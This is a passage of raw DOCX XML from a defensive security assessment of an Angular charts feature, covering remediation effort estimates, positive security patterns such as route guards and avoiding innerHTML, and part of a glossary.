        <w:t xml:space="preserve">Run SCA scan; update Chart.js and ng2-charts to latest stable versions; integrate SCA into CI/CD —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: 4–8 hours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink w:anchor="sec-013">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-013</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Run SCA scan for D3.js; update to latest stable version (shared effort with SEC-009) —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Effort: Included in SEC-009 effort</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4 Total Effort Estimate:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">6–12 days</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="Xc3ebe84791a6f67f12e281f420a664875408cc8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. Positive Security Patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pattern 1: Separation of Security Concerns via Route Guards</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Where:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">All three assessed screens — Charts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), Chartjs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), D3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Standard Alignment:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP AVSV V4.1.1 (access control on trusted service layer); NIST SP 800-53 AC-3 (Access Enforcement)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">All three screens consistently delegate authentication and authorization enforcement to Angular route guards at the routing module level rather than implementing ad-hoc checks within component classes. This is the architecturally correct pattern in Angular — centralizing access control in guards ensures consistent enforcement across all routes and prevents individual components from becoming security boundaries that can be bypassed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Extend this pattern by ensuring the routing module is included in future security audits, and by adding automated tests that verify route guards reject unauthenticated requests. Consider implementing a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CanLoad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guard in addition to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">CanActivate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to prevent the feature module's JavaScript bundle from being downloaded by unauthenticated users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pattern 2: No Direct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">[innerHTML]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Binding in Assessed Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Where:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Charts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), Chartjs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), D3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — component class and documented template patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Standard Alignment:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP AVSV V5.3.3 (context-aware output encoding against XSS); CWE-79 (Cross-site Scripting); NIST SP 800-53 SI-10 (Information Input Validation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The documentation explicitly confirms that none of the three assessed components use Angular's</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[innerHTML]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">binding or any other pattern that bypasses Angular's built-in template sanitization. The Charts screen documentation states: "The component does not use Angular's</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[innerHTML]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">binding or any other pattern that could introduce XSS vulnerabilities." This is a meaningful positive control —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[innerHTML]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is one of the most common sources of DOM XSS in Angular applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Extend this pattern by establishing a linting rule (e.g., via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@angular-eslint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) that flags any use of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[innerHTML]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in the codebase and requires a security review before approval. Apply the same scrutiny to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[outerHTML]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bypassSecurityTrustHtml()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">usages.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pattern 3: Minimal Attack Surface Through Stateless Presentational Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Where:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">All three assessed screens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Standard Alignment:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP AVSV V1.1.2 (threat modeling for security design); NIST SP 800-53 SA-8 (Security and Privacy Engineering Principles — principle of least functionality)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">All three components are architecturally minimal — empty class bodies, no API calls, no user input handling, no session token management, and no sensitive data processing. This design minimizes the attack surface at the component level. A component that does nothing cannot be exploited for what it does. The development team has consciously applied the Angular principle of thin shell components, which aligns with the security principle of least functionality.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Document this architectural decision explicitly in the project's security architecture documentation. Establish a component review checklist that flags any addition of API calls, user input handling, or data persistence to currently-stateless components — these additions should trigger a security review before merging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Pattern 4: Documented Security Awareness of Known Risks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Where:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">D3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 14; Chartjs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/chartjs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 17; Charts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Standard Alignment:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">OWASP AVSV V1.1.1 (secure software development lifecycle); NIST SP 800-53 SA-15 (Development Process, Standards, and Tools)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The development team has proactively documented known security risks within the screen documentation itself — including the D3.js XSS risk via</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.html()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">methods, the Chart.js canvas accessibility gap, and the requirement for route guard verification. This level of security awareness in developer-facing documentation is a positive indicator of a security-conscious development culture and reduces the risk that these issues are overlooked during future development.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Formalize this practice by creating a "Security Considerations" section template for all screen documentation, and by linking documented security risks to the project's issue tracker so they are tracked to resolution rather than remaining as documentation notes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="47" w:name="Xcb993899199370decf8563a1767dcf3b190058b"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Glossary</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="41" w:name="application-domain-terms"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Application Domain Terms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Shell Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An Angular component whose sole purpose is to provide a routing structure (via</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;router-outlet&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) for child routes, containing no business logic or UI of its own.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChartsComponent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">and</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">D3Component</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">are examples.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Presentational Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An Angular component that contains no business logic, no state management, and no service dependencies — it only renders its template.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChartjsComponent</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">is a presentational component.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Child Route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A route defined as a nested entry under a parent path (e.g.,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/chartjs</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">under</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">). Child route components are rendered inside the parent's</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;router-outlet&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Feature Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An Angular NgModule that encapsulates a related set of components, services, and routes for a specific application feature — in this case, the charts feature.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Leaf Route</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A route that has no child routes — it is a terminal destination in the application's routing tree.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/chartjs</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">and</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/d3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">are leaf routes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;router-outlet&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An Angular directive that acts as a placeholder in the DOM where the router renders the component matched by the current URL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Nebular / NGX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A customizable Angular UI framework (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@nebular/theme</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">) that provides layout components (cards, grids, sidebars) used to structure the application's UI.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Chart.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">An open-source JavaScript charting library that renders charts onto HTML5</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;canvas&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">elements. Used by the</w:t>
            </w:r>
            <w:r>
